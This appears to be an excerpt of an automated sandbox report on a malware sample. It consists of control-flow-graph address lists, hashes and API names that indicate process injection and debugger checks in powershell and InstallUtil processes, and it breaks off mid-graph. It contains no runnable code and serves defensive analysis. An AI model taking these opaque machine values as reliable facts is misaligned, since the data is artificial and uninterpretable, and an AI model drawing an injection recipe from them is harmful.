7ff848e00ccd-7ff848e00ce4 141->143 144 7ff848e00c6b 141->144 142->141 148 7ff848e00e1d-7ff848e00e3d 143->148 149 7ff848e00cea-7ff848e00cf4 143->149 147 7ff848e00e3e-7ff848e00ecd 144->147 175 7ff848e00ac1-7ff848e00ace 145->175 176 7ff848e00ad8-7ff848e00ade 145->176 204 7ff848e00ed0-7ff848e00ee1 147->204 205 7ff848e00ecf 147->205 148->147 152 7ff848e00cf6-7ff848e00d03 149->152 153 7ff848e00d0d-7ff848e00d12 149->153 152->153 163 7ff848e00d05-7ff848e00d0b 152->163 156 7ff848e00dbe-7ff848e00dc8 153->156 157 7ff848e00d18-7ff848e00d1b 153->157 161 7ff848e00dd7-7ff848e00e1a 156->161 162 7ff848e00dca-7ff848e00dd6 156->162 164 7ff848e00d32-7ff848e00d36 157->164 165 7ff848e00d1d-7ff848e00d26 157->165 161->148 163->153 164->156 172 7ff848e00d3c-7ff848e00d3f 164->172 165->164 173 7ff848e00d66 172->173 174 7ff848e00d41-7ff848e00d55 172->174 180 7ff848e00d68-7ff848e00d6a 173->180 194 7ff848e00d56-7ff848e00d64 174->194 175->176 184 7ff848e00ad0-7ff848e00ad6 175->184 181 7ff848e00ae0-7ff848e00af8 176->181 182 7ff848e00afa-7ff848e00afd 176->182 180->156 186 7ff848e00d6c-7ff848e00d7a 180->186 181->182 189 7ff848e00b04-7ff848e00b0d 182->189 184->176 186->194 197 7ff848e00d7c-7ff848e00d88 186->197 192 7ff848e00b26-7ff848e00b33 189->192 193 7ff848e00b0f-7ff848e00b24 189->193 193->192 194->180 202 7ff848e00d8e-7ff848e00d97 197->202 206 7ff848e00db0-7ff848e00dbd 202->206 207 7ff848e00d99-7ff848e00da6 202->207 208 7ff848e00ee4-7ff848e00f74 204->208 209 7ff848e00ee3 204->209 205->204 207->206 211 7ff848e00da8-7ff848e00dae 207->211 216 7ff848e010d2-7ff848e010fb 208->216 217 7ff848e00f7a-7ff848e00f84 208->217 209->208 211->206 218 7ff848e00f86-7ff848e00f93 217->218 219 7ff848e00f9d-7ff848e00fa2 217->219 218->219 227 7ff848e00f95-7ff848e00f9b 218->227 222 7ff848e01073-7ff848e0107d 219->222 223 7ff848e00fa8-7ff848e00fab 219->223 225 7ff848e0107f-7ff848e0108b 222->225 226 7ff848e0108c-7ff848e010cf 222->226 228 7ff848e00fc2-7ff848e00fc6 223->228 229 7ff848e00fad-7ff848e00fb6 223->229 226->216 227->219 228->222 234 7ff848e00fcc-7ff848e00fcf 228->234 229->228 236 7ff848e00fe6 234->236 237 7ff848e00fd1-7ff848e00fe4 234->237 238 7ff848e00fe8-7ff848e00fea 236->238 237->238 238->222 240 7ff848e00ff0-7ff848e00ff6 238->240 242 7ff848e01012-7ff848e01018 240->242 243 7ff848e00ff8-7ff848e01005 240->243 246 7ff848e01034-7ff848e01072 242->246 247 7ff848e0101a-7ff848e01032 242->247 243->242 248 7ff848e01007-7ff848e01010 243->248 247->246 248->242
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147415354.00007FF848E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848e00000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e514e976062b2a4ceaa88afd98fb585a47a206e322aa8907f659173b1b691c1c
                                                  • Instruction ID: db4cf26c5031070015596e4c860abe9530c713a3973f417f9240dfd5890f0da9
                                                  • Opcode Fuzzy Hash: e514e976062b2a4ceaa88afd98fb585a47a206e322aa8907f659173b1b691c1c
                                                  • Instruction Fuzzy Hash: 87425631E0EA9A4FE7A6BA2818152B57BE1FF57394F0805BBC04DC71D3EE289C058356

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147068284.00007FF848D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848d30000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: L_I
                                                  • API String ID: 0-1627180413
                                                  • Opcode ID: 512486c203dde9f3f945566ab9039396dad2674f6652fb1cfe3e1170a429e5a4
                                                  • Instruction ID: df3fd34f55567dc89ea3bcd3fbeae46a5abc679d7f2ee33950b6986d7001bb86
                                                  • Opcode Fuzzy Hash: 512486c203dde9f3f945566ab9039396dad2674f6652fb1cfe3e1170a429e5a4
                                                  • Instruction Fuzzy Hash: C1025770D09A5D8FEB98DF58D849BE9BBF1FB69300F1041AED009E3295DB74A985CB40

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147068284.00007FF848D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848d30000_powershell.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: d27f6375ff4e05fc04bcc72dcc2872a9092c0e493bbca7bfa1ed428e714e02dd
                                                  • Instruction ID: 3e1e82816ec9c9f61b580c43414a6cbd9adcd9c654f2b098e25a6ec538769a46
                                                  • Opcode Fuzzy Hash: d27f6375ff4e05fc04bcc72dcc2872a9092c0e493bbca7bfa1ed428e714e02dd
                                                  • Instruction Fuzzy Hash: 49A11670909A5D8FDB99DF18C894BE9BBF1FB69301F0001AED40AE3291DB759984CF40

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147068284.00007FF848D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848d30000_powershell.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 63a965c7390342952b8be25bdae80fba08aeb550ad5176d1f6dc529cf97bb9a1
                                                  • Instruction ID: 0f31ba3f1a250261478bee5bab7cbe5d7737ae84a29aaa1f9b6c74609d73ff94
                                                  • Opcode Fuzzy Hash: 63a965c7390342952b8be25bdae80fba08aeb550ad5176d1f6dc529cf97bb9a1
                                                  • Instruction Fuzzy Hash: 9D611370908A5C8FDB98DF98C884BE9BBF1FB69310F1041AED44DE3291DB74A985CB44

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147068284.00007FF848D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848d30000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: a55a4fd8d1e575d9e790c7ea7b32293e127c9e2aec67ca9d717c821619e38e2c
                                                  • Instruction ID: 5875cb439f2ad21012d3fd5a0f800e23dfabcb0cf0690e9409c61230fd5d6f60
                                                  • Opcode Fuzzy Hash: a55a4fd8d1e575d9e790c7ea7b32293e127c9e2aec67ca9d717c821619e38e2c
                                                  • Instruction Fuzzy Hash: EC518F70D08A4D8FEB55DFA8C844BE9BBF1FB66311F1482AAD048D7256C7749889CF50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 81 7ff848d38529-7ff848d38535 82 7ff848d38540-7ff848d3860a ResumeThread 81->82 83 7ff848d38537-7ff848d3853f 81->83 86 7ff848d3860c 82->86 87 7ff848d38612-7ff848d38650 82->87 83->82 86->87
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147068284.00007FF848D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848d30000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 83e4783fd93001251ccd741877afc29ddb0040e99331bbcd5f90c8b3decf95f4
                                                  • Instruction ID: b722a2b65533021350e5eba10f50f86351b62de9e74f5b9859efb7de926ad920
                                                  • Opcode Fuzzy Hash: 83e4783fd93001251ccd741877afc29ddb0040e99331bbcd5f90c8b3decf95f4
                                                  • Instruction Fuzzy Hash: 2941497090C64C8FDB59DF98D895BA9BBF0EB5A310F1041AED049E7252DB70A885CB41

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 333 7ff848e009ea-7ff848e009f6 335 7ff848e00b34-7ff848e00b3e 333->335 336 7ff848e009fc-7ff848e00a33 333->336 338 7ff848e00b40-7ff848e00b4c 335->338 339 7ff848e00b4d-7ff848e00c45 335->339 346 7ff848e00a57 336->346 347 7ff848e00a35-7ff848e00a55 336->347 382 7ff848e00c47 339->382 383 7ff848e00c48-7ff848e00c59 339->383 348 7ff848e00a59-7ff848e00a5b 346->348 347->348 348->335 351 7ff848e00a61-7ff848e00a64 348->351 354 7ff848e00a66-7ff848e00a79 351->354 355 7ff848e00a7b 351->355 358 7ff848e00a7d-7ff848e00a7f 354->358 355->358 358->335 360 7ff848e00a85-7ff848e00abf 358->360 369 7ff848e00ac1-7ff848e00ace 360->369 370 7ff848e00ad8-7ff848e00ade 360->370 369->370 375 7ff848e00ad0-7ff848e00ad6 369->375 373 7ff848e00ae0-7ff848e00af8 370->373 374 7ff848e00afa-7ff848e00afd 370->374 373->374 377 7ff848e00b04-7ff848e00b0d 374->377 375->370 379 7ff848e00b26-7ff848e00b33 377->379 380 7ff848e00b0f-7ff848e00b24 377->380 380->379 382->383 386 7ff848e00c5c-7ff848e00c69 383->386 387 7ff848e00c5b 383->387 388 7ff848e00ccd-7ff848e00ce4 386->388 389 7ff848e00c6b 386->389 387->386 391 7ff848e00e1d-7ff848e00e3d 388->391 392 7ff848e00cea-7ff848e00cf4 388->392 390 7ff848e00e3e-7ff848e00ecd 389->390 431 7ff848e00ed0-7ff848e00ee1 390->431 432 7ff848e00ecf 390->432 391->390 395 7ff848e00cf6-7ff848e00d03 392->395 396 7ff848e00d0d-7ff848e00d12 392->396 395->396 405 7ff848e00d05-7ff848e00d0b 395->405 399 7ff848e00dbe-7ff848e00dc8 396->399 400 7ff848e00d18-7ff848e00d1b 396->400 403 7ff848e00dd7-7ff848e00e1a 399->403 404 7ff848e00dca-7ff848e00dd6 399->404 406 7ff848e00d32-7ff848e00d36 400->406 407 7ff848e00d1d-7ff848e00d26 400->407 403->391 405->396 406->399 413 7ff848e00d3c-7ff848e00d3f 406->413 407->406 414 7ff848e00d66 413->414 415 7ff848e00d41-7ff848e00d55 413->415 418 7ff848e00d68-7ff848e00d6a 414->418 425 7ff848e00d56-7ff848e00d64 415->425 418->399 421 7ff848e00d6c-7ff848e00d7a 418->421 421->425 427 7ff848e00d7c-7ff848e00d88 421->427 425->418 430 7ff848e00d8e-7ff848e00d97 427->430 433 7ff848e00db0-7ff848e00dbd 430->433 434 7ff848e00d99-7ff848e00da6 430->434 435 7ff848e00ee4-7ff848e00f74 431->435 436 7ff848e00ee3 431->436 432->431 434->433 438 7ff848e00da8-7ff848e00dae 434->438 443 7ff848e010d2-7ff848e010fb 435->443 444 7ff848e00f7a-7ff848e00f84 435->444 436->435 438->433 445 7ff848e00f86-7ff848e00f93 444->445 446 7ff848e00f9d-7ff848e00fa2 444->446 445->446 454 7ff848e00f95-7ff848e00f9b 445->454 449 7ff848e01073-7ff848e0107d 446->449 450 7ff848e00fa8-7ff848e00fab 446->450 452 7ff848e0107f-7ff848e0108b 449->452 453 7ff848e0108c-7ff848e010cf 449->453 455 7ff848e00fc2-7ff848e00fc6 450->455 456 7ff848e00fad-7ff848e00fb6 450->456 453->443 454->446 455->449 461 7ff848e00fcc-7ff848e00fcf 455->461 456->455 463 7ff848e00fe6 461->463 464 7ff848e00fd1-7ff848e00fe4 461->464 465 7ff848e00fe8-7ff848e00fea 463->465 464->465 465->449 467 7ff848e00ff0-7ff848e00ff6 465->467 469 7ff848e01012-7ff848e01018 467->469 470 7ff848e00ff8-7ff848e01005 467->470 473 7ff848e01034-7ff848e01072 469->473 474 7ff848e0101a-7ff848e01032 469->474 470->469 475 7ff848e01007-7ff848e01010 470->475 474->473 475->469
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147415354.00007FF848E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848e00000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 681745b019fc758811528899ca6a846210e01854c91c3acbde3051e196b835d5
                                                  • Instruction ID: 60ae90e61cd03b474f68afe23aef5841e030b974bceb172f3f28460ee1f7439a
                                                  • Opcode Fuzzy Hash: 681745b019fc758811528899ca6a846210e01854c91c3acbde3051e196b835d5
                                                  • Instruction Fuzzy Hash: CB41E221E1EA9B4FF3AAB628045527966E1FF522A9F5805B9C40DD31D3EF2CE804430A

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147415354.00007FF848E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848e00000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3f2741dbeb3ff71e330719b3732c699db8c6a40e85c7b2d0f2d69909e8da7f53
                                                  • Instruction ID: f24a46bd8d2d97f615353c139a38265f06a52c756cd16547b7c6283cc12ddea6
                                                  • Opcode Fuzzy Hash: 3f2741dbeb3ff71e330719b3732c699db8c6a40e85c7b2d0f2d69909e8da7f53
                                                  • Instruction Fuzzy Hash: E331C432F0CA294FEBA5A95C64116B9B2D2FF55760F5805BBC50EC7287EF199C048289

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147415354.00007FF848E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848e00000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 629b9e32802602932f2cb931c75212ca35af6ae7f2d487936fd76368b708f20f
                                                  • Instruction ID: 8340ed165c31995f5e79cb16762b0e925e9ab473b0664650fddea0686ec50eb9
                                                  • Opcode Fuzzy Hash: 629b9e32802602932f2cb931c75212ca35af6ae7f2d487936fd76368b708f20f
                                                  • Instruction Fuzzy Hash: 1A213732F0D9294FEBA5A6AC64052F8B3D1FF956A0F1806B7C41DC318BEF28AC054384

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 554 7ff848e00d2a-7ff848e00d36 556 7ff848e00dbe-7ff848e00dc8 554->556 557 7ff848e00d3c-7ff848e00d3f 554->557 560 7ff848e00dd7-7ff848e00ecd 556->560 561 7ff848e00dca-7ff848e00dd6 556->561 558 7ff848e00d66 557->558 559 7ff848e00d41-7ff848e00d55 557->559 563 7ff848e00d68-7ff848e00d6a 558->563 569 7ff848e00d56-7ff848e00d64 559->569 590 7ff848e00ed0-7ff848e00ee1 560->590 591 7ff848e00ecf 560->591 563->556 565 7ff848e00d6c-7ff848e00d7a 563->565 565->569 570 7ff848e00d7c-7ff848e00d88 565->570 569->563 573 7ff848e00d8e-7ff848e00d97 570->573 575 7ff848e00db0-7ff848e00dbd 573->575 576 7ff848e00d99-7ff848e00da6 573->576 576->575 578 7ff848e00da8-7ff848e00dae 576->578 578->575 592 7ff848e00ee4-7ff848e00f74 590->592 593 7ff848e00ee3 590->593 591->590 597 7ff848e010d2-7ff848e010fb 592->597 598 7ff848e00f7a-7ff848e00f84 592->598 593->592 599 7ff848e00f86-7ff848e00f93 598->599 600 7ff848e00f9d-7ff848e00fa2 598->600 599->600 608 7ff848e00f95-7ff848e00f9b 599->608 603 7ff848e01073-7ff848e0107d 600->603 604 7ff848e00fa8-7ff848e00fab 600->604 606 7ff848e0107f-7ff848e0108b 603->606 607 7ff848e0108c-7ff848e010cf 603->607 609 7ff848e00fc2-7ff848e00fc6 604->609 610 7ff848e00fad-7ff848e00fb6 604->610 607->597 608->600 609->603 615 7ff848e00fcc-7ff848e00fcf 609->615 610->609 617 7ff848e00fe6 615->617 618 7ff848e00fd1-7ff848e00fe4 615->618 619 7ff848e00fe8-7ff848e00fea 617->619 618->619 619->603 621 7ff848e00ff0-7ff848e00ff6 619->621 623 7ff848e01012-7ff848e01018 621->623 624 7ff848e00ff8-7ff848e01005 621->624 627 7ff848e01034-7ff848e01072 623->627 628 7ff848e0101a-7ff848e01032 623->628 624->623 629 7ff848e01007-7ff848e01010 624->629 628->627 629->623
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147415354.00007FF848E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848e00000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d894689c4f2cfa0d1240065fd0f99c25f749fe1ceb02f96aefd8b8ffa1a67658
                                                  • Instruction ID: cdfec940228ad38479b493342170b2d76457c1be45b508bc4b8e5e99b62da14f
                                                  • Opcode Fuzzy Hash: d894689c4f2cfa0d1240065fd0f99c25f749fe1ceb02f96aefd8b8ffa1a67658
                                                  • Instruction Fuzzy Hash: 2011C222E1DA3E4FF7A9B52C14592B552C2FF95295F040576D40DC3196FF28BC0542A9
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147415354.00007FF848E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848e00000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cd0c15ae2e4c2638a34b2ab8264f5f988bbc563ade817dcbda58821b1603f764
                                                  • Instruction ID: 5af418fcf9d75d87fe98ca4feaff3c1d67dc1041312c5adc47633a8a0ffc8283
                                                  • Opcode Fuzzy Hash: cd0c15ae2e4c2638a34b2ab8264f5f988bbc563ade817dcbda58821b1603f764
                                                  • Instruction Fuzzy Hash: 8C01F922F1DE3A1FF7AAB51C14152B891D2FF96391F58097AC50EC7287EF199C045249
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147415354.00007FF848E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848e00000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cb8d1d08f853962db393d41e1f618ebb08f2bd020e8206c268c6bed067a5e550
                                                  • Instruction ID: 3a462fb58177e4b861f7eddc660aecc2f314c47d1c3c087c584fdbe5c96b73d2
                                                  • Opcode Fuzzy Hash: cb8d1d08f853962db393d41e1f618ebb08f2bd020e8206c268c6bed067a5e550
                                                  • Instruction Fuzzy Hash: C6F09631B1CA184FE768DB1C9805179B7E2FBD9125B04427FD04FD3562DF25D8024745
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147415354.00007FF848E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848e00000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d0a870914dc4c33a07a6c6b4a065fce36c8142aaeb2a4a7263bf448522cea7c6
                                                  • Instruction ID: 92e4a126dfbc09a3cec1c0bdb9f9d4d1454a7f8691588ac351a4d97b07fcb79f
                                                  • Opcode Fuzzy Hash: d0a870914dc4c33a07a6c6b4a065fce36c8142aaeb2a4a7263bf448522cea7c6
                                                  • Instruction Fuzzy Hash: 0CF02722F1D97D5FE2E6B1AC24091F466D1FF65AA0F5806B2D91CC328BFE285C190385
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147068284.00007FF848D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848d30000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: efa08c337c7e9bb0c5884bf8a60ca20ead1a0122eddf2468000dc833c90df470
                                                  • Instruction ID: aac93b70bb90c9c7fd1b81592efe7a7339401672154d8bbb5dfcfd8eabe53857
                                                  • Opcode Fuzzy Hash: efa08c337c7e9bb0c5884bf8a60ca20ead1a0122eddf2468000dc833c90df470
                                                  • Instruction Fuzzy Hash: 22822871D096298FEBA8EB14D895BE9B7B1FF58340F4041FAD00DA3291DB346A89CF54

                                                  Execution Graph

                                                  Execution Coverage:12.4%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:2.6%
                                                  Total number of Nodes:116
                                                  Total number of Limit Nodes:14
                                                  execution_graph 41519 bc0848 41521 bc084e 41519->41521 41520 bc091b 41521->41520 41526 60f5d02 41521->41526 41530 60f5d10 41521->41530 41534 bc14af 41521->41534 41542 bc1388 41521->41542 41527 60f5d1f 41526->41527 41550 60f54c4 41527->41550 41531 60f5d1f 41530->41531 41532 60f54c4 2 API calls 41531->41532 41533 60f5d40 41532->41533 41533->41521 41536 bc1396 41534->41536 41537 bc14bb 41534->41537 41535 bc14aa 41535->41521 41536->41535 41541 bc14af 2 API calls 41536->41541 41618 bc8268 41536->41618 41625 bc8150 41536->41625 41629 bc8140 41536->41629 41537->41521 41541->41536 41543 bc134b 41542->41543 41545 bc138b 41542->41545 41543->41521 41544 bc14aa 41544->41521 41545->41544 41546 bc8268 2 API calls 41545->41546 41547 bc8150 2 API calls 41545->41547 41548 bc8140 2 API calls 41545->41548 41549 bc14af 2 API calls 41545->41549 41546->41545 41547->41545 41548->41545 41549->41545 41551 60f54cf 41550->41551 41554 60f6c2c 41551->41554 41553 60f76c6 41553->41553 41555 60f6c37 41554->41555 41556 60f7dec 41555->41556 41559 60f9a68 41555->41559 41564 60f9a57 41555->41564 41556->41553 41560 60f9a89 41559->41560 41561 60f9aad 41560->41561 41569 60f9c0a 41560->41569 41573 60f9c18 41560->41573 41561->41556 41565 60f9a89 41564->41565 41566 60f9aad 41565->41566 41567 60f9c0a 2 API calls 41565->41567 41568 60f9c18 2 API calls 41565->41568 41566->41556 41567->41566 41568->41566 41570 60f9c18 41569->41570 41571 60f9c5e 41570->41571 41577 60f895c 41570->41577 41571->41561 41576 60f9c25 41573->41576 41574 60f9c5e 41574->41561 41575 60f895c 2 API calls 41575->41574 41576->41574 41576->41575 41578 60f8967 41577->41578 41580 60f9cd0 41578->41580 41581 60f8990 41578->41581 41580->41580 41582 60f899b 41581->41582 41588 60f89a0 41582->41588 41584 60f9d3f 41592 60fef48 41584->41592 41597 60fef60 41584->41597 41585 60f9d79 41585->41580 41589 60f89ab 41588->41589 41590 60faee0 41589->41590 41591 60f9a68 2 API calls 41589->41591 41590->41584 41591->41590 41593 60fef55 41592->41593 41594 60fef9d 41593->41594 41603 60ff1c9 41593->41603 41607 60ff1d8 41593->41607 41594->41585 41599 60fef91 41597->41599 41600 60fefdd 41597->41600 41598 60fef9d 41598->41585 41599->41598 41601 60ff1c9 2 API calls 41599->41601 41602 60ff1d8 2 API calls 41599->41602 41600->41585 41601->41600 41602->41600 41604 60ff1d8 41603->41604 41610 60ff218 41604->41610 41605 60ff1e2 41605->41594 41609 60ff218 2 API calls 41607->41609 41608 60ff1e2 41608->41594 41609->41608 41611 60ff239 41610->41611 41613 60ff25c 41610->41613 41611->41613 41616 60ff4b0 LoadLibraryExW 41611->41616 41617 60ff4c0 LoadLibraryExW 41611->41617 41612 60ff254 41612->41613 41614 60ff460 GetModuleHandleW 41612->41614 41613->41605 41615 60ff48d 41614->41615 41615->41605 41616->41612 41617->41612 41619 bc8272 41618->41619 41620 bc828c 41619->41620 41633 610f710 41619->41633 41637 610f700 41619->41637 41624 bc82d2 41620->41624 41641 bcfb8f 41620->41641 41624->41536 41627 bc8166 41625->41627 41626 bc82d2 41626->41536 41627->41626 41628 bcfb8f 2 API calls 41627->41628 41628->41626 41631 bc8166 41629->41631 41630 bc82d2 41630->41536 41631->41630 41632 bcfb8f 2 API calls 41631->41632 41632->41630 41635 610f725 41633->41635 41634 610f93a 41634->41620 41635->41634 41636 610fd58 GlobalMemoryStatusEx GlobalMemoryStatusEx 41635->41636 41636->41635 41639 610f725 41637->41639 41638 610f93a 41638->41620 41639->41638 41640 610fd58 GlobalMemoryStatusEx GlobalMemoryStatusEx 41639->41640 41640->41639 41642 bcfb9a 41641->41642 41644 610f710 2 API calls 41642->41644 41645 610f700 2 API calls 41642->41645 41643 bcfba1 41643->41624 41644->41643 41645->41643 41646 60f6e18 41647 60f6e5e GetCurrentProcess 41646->41647 41649 60f6ea9 41647->41649 41650 60f6eb0 GetCurrentThread 41647->41650 41649->41650 41651 60f6eed GetCurrentProcess 41650->41651 41652 60f6ee6 41650->41652 41653 60f6f23 41651->41653 41652->41651 41654 60f6f4b GetCurrentThreadId 41653->41654 41655 60f6f7c 41654->41655 41514 bc70b0 41515 bc70f4 CheckRemoteDebuggerPresent 41514->41515 41516 bc7136 41515->41516 41517 60f7060 DuplicateHandle 41518 60f70f6 41517->41518
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $cq$$cq$$cq$$cq$$cq$$cq
                                                  • API String ID: 0-2877684506
                                                  • Opcode ID: e119d9aa341f38f58dd1ca09544d5ab0fb2cc72024adf04d72e4d747c4446ea9
                                                  • Instruction ID: 48c23fff80b26385ac04820b4d4149a5bd63d1ee59d1d21df1268f066d77b5be
                                                  • Opcode Fuzzy Hash: e119d9aa341f38f58dd1ca09544d5ab0fb2cc72024adf04d72e4d747c4446ea9
                                                  • Instruction Fuzzy Hash: A2D26B34E10605CFDF64DF68C588A9DB7B2FF89300F5485AAD449AB2A5DB71ED81CB80
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $cq$$cq$$cq$$cq$$cq$$cq
                                                  • API String ID: 0-2877684506
                                                  • Opcode ID: 1f926b7cc1c67cf7812eb5f2581e7483eb90bcf882274153068c7cacbdefb382
                                                  • Instruction ID: f75015809014507e92757ed2f037547dd8388402028f5bf451ecc6489d644bf9
                                                  • Opcode Fuzzy Hash: 1f926b7cc1c67cf7812eb5f2581e7483eb90bcf882274153068c7cacbdefb382
                                                  • Instruction Fuzzy Hash: 45529F74E141098FEF64DB68D5807AEB7B2EB85310F20892AE405DB3D5DBB6DC81CB91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2323 6107e50-6107e6e 2324 6107e70-6107e73 2323->2324 2325 6107e80-6107e83 2324->2325 2326 6107e75-6107e7f 2324->2326 2327 6107ea4-6107ea7 2325->2327 2328 6107e85-6107e9f 2325->2328 2329 6107ea9-6107ec5 2327->2329 2330 6107eca-6107ecd 2327->2330 2328->2327 2329->2330 2332 6107ee4-6107ee6 2330->2332 2333 6107ecf-6107edd 2330->2333 2334 6107ee8 2332->2334 2335 6107eed-6107ef0 2332->2335 2337 6107ef6-6107f0c 2333->2337 2341 6107edf 2333->2341 2334->2335 2335->2324 2335->2337 2343 6107f12-6107f1b 2337->2343 2344 6108127-6108131 2337->2344 2341->2332 2345 6107f21-6107f3e 2343->2345 2346 6108132-6108167 2343->2346 2355 6108114-6108121 2345->2355 2356 6107f44-6107f6c 2345->2356 2349 6108169-610816c 2346->2349 2351 6108172-610817e 2349->2351 2352 610821f-6108222 2349->2352 2357 6108189-610818b 2351->2357 2353 6108228-6108237 2352->2353 2354 610844e-6108451 2352->2354 2371 6108256-6108291 2353->2371 2372 6108239-6108254 2353->2372 2358 6108453-610846f 2354->2358 2359 6108474-6108476 2354->2359 2355->2343 2355->2344 2356->2355 2376 6107f72-6107f7b 2356->2376 2360 61081a3-61081aa 2357->2360 2361 610818d-6108193 2357->2361 2358->2359 2362 6108478 2359->2362 2363 610847d-6108480 2359->2363 2369 61081bb 2360->2369 2370 61081ac-61081b9 2360->2370 2366 6108195 2361->2366 2367 6108197-6108199 2361->2367 2362->2363 2363->2349 2368 6108486-610848f 2363->2368 2366->2360 2367->2360 2374 61081c0-61081c2 2369->2374 2370->2374 2382 6108422-6108438 2371->2382 2383 6108297-61082a8 2371->2383 